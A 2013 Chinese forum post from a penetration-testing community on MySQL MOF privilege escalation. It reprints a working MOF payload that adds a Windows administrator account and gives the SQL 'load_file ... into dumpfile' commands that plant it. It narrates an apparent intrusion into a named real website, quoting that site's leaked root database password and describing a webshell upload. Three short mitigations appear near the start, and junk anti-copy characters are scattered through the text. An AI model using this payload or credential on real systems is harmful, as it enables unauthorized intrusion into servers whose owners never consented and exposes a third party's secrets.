中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法& j3 w. y; Y7 y$ X

7 G, M2 @: I5 y, x/ J1 W网上公开的一些利用代码:0 v6 j, o1 I5 B* @  i& m& o

9 }4 V. P; ]" X  p& H  Z  z; M, e$ x( Y  H#pragma namespace(“\\\\.\\root\\subscription”)
2 ]: [5 x! N5 N0 u2 ~( l) z* B: P4 g8 z: R- t6 l4 p1 _
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
: f* Q7 a$ t1 q& m
' G8 T7 G" B* t8 j1 E
" h/ d( M' O6 Q: m( L, `# j
  A7 i, X+ a+ ]& S 2 D4 R( E1 z( x
& {; H0 P3 J8 k0 d3 F( G
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;: e$ l+ N! @! X1 o
从上面代码来看得出解决办法:
8 o9 o/ e/ O4 m2 g8 _3 m
6 v4 z. _: z) {/ u+ [/ ]8 g7 O" R1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
. J9 W5 q2 \! N! i# a8 D8 X+ w2 R/ q  O0 r, z3 D( {0 x! s4 s
2、禁止使用”WScript.Shel”组件
; N  N+ S1 \1 ]4 w# z
+ V0 F; B; D+ W! v7 x/ X3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
' V0 F5 Q) b; d( U: a
: }  |7 ~2 I4 F" y$ s9 p当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下( I5 ~6 H' x6 c& C# C
( @9 J# T. h: K# j2 Q4 V* h- _% s
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权0 g$ K4 E' x* T6 a5 t$ {. g# s

: a+ Y" s0 X$ U* M1 y但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容+ z$ t0 X7 I, l! F, P; {) d$ D+ J

& Q, u4 f% \/ |" S9 R0 o7 r7 w; @1 F看懂了后就开始练手吧
# `& x2 k2 h" Y% ]
) H8 |+ L4 T+ e5 ]2 c/ Nhttp://www.webbmw.com/config/config_ucenter.php 一句话 a4 s' ?5 O' z" E; u; _2 O! w
7 ~' t# y5 B" C7 ]1 \( K( @
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。' a& o: ?: ^5 }  _

' @0 C, D, \5 W5 i, Z' r6 w于是直接用菜刀开搞
5 z' P$ D3 G0 ?7 _/ D6 G
/ u+ C4 w' ~( N上马先
: e+ C( _9 y& ^2 j7 @1 |  d# @/ H* R( D! B% u7 C) V
既然有了那些账号 之类的 于是我们就执行吧…….- Y) H, m* Q! z: x0 w9 h% _

( ?# A6 ?4 O& s3 }+ W小小的说下, T/ I2 Q" g6 }: U: H

" K$ g4 t9 n- w. {/ L9 _) u: i在这里第1次执行未成功        原因未知
- p, l9 ^* O+ k7 U% B$ {) r& p; \* M1 y. S* a/ R' X
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' S% {* @( z" Y0 ^/ W  Y! P, s! i1 n  b, g9 V
#pragma namespace(“\\\\.\\root\\subscription”)# I' S0 L" T0 m

, E3 o& q! l' A. p/ m, m! Qinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };. U- R" T) y5 U$ s' x0 E
- x. r8 H  \' V5 F
我是将文件放到C:\WINDOWS\temp\1.mof/ o& L8 f% t2 T! d( y; Q
4 d4 m  v; O9 \0 e4 n
所以我们就改下执行的代码
$ c/ J; o2 O" r& N% W; n" Q0 r- n
0 G% W! w" F# y. e1 r+ uselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
" V+ p' c9 q* l4 F+ q1 x; ^$ H4 l& X# `) u

2 N4 e7 [1 D- H! a2 ]# {  v1 x3 @9 Z. j; m/ h" i
但是 你会发现账号还是没有躺在那里。。8 A6 ~$ u( O: j/ b

1 }; o+ d# d# ^' o" ], X* m于是我就感觉蛋疼
( b9 j0 C' {, ~, B- r0 z" J3 N6 X9 _# R* R* B! `
就去一个一个去执行 但是执行到第2个 mysql时就成功了………" Y$ y2 x* ^% d' S
+ K4 s1 L) U: Z8 ?4 q4 p9 Q& u8 T

' |3 v4 i1 ~1 L$ U
" s& k! [4 K$ t7 C& d6 G+ K+ O" Y- ]但是其他库均不成功…
& ?' ?1 l, p5 F2 I9 H, b) ?1 V& R
我就很费解呀 到底为什么不成功求大牛解答…! c6 ~. ?2 w  G" C' e3 H
1 f! _/ i0 }6 Y! W9 F: G( c3 i) N: M
0 e0 o1 z3 b; N( d( I: j2 G
( {0 Z- L- k2 @" G, I8 N' O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2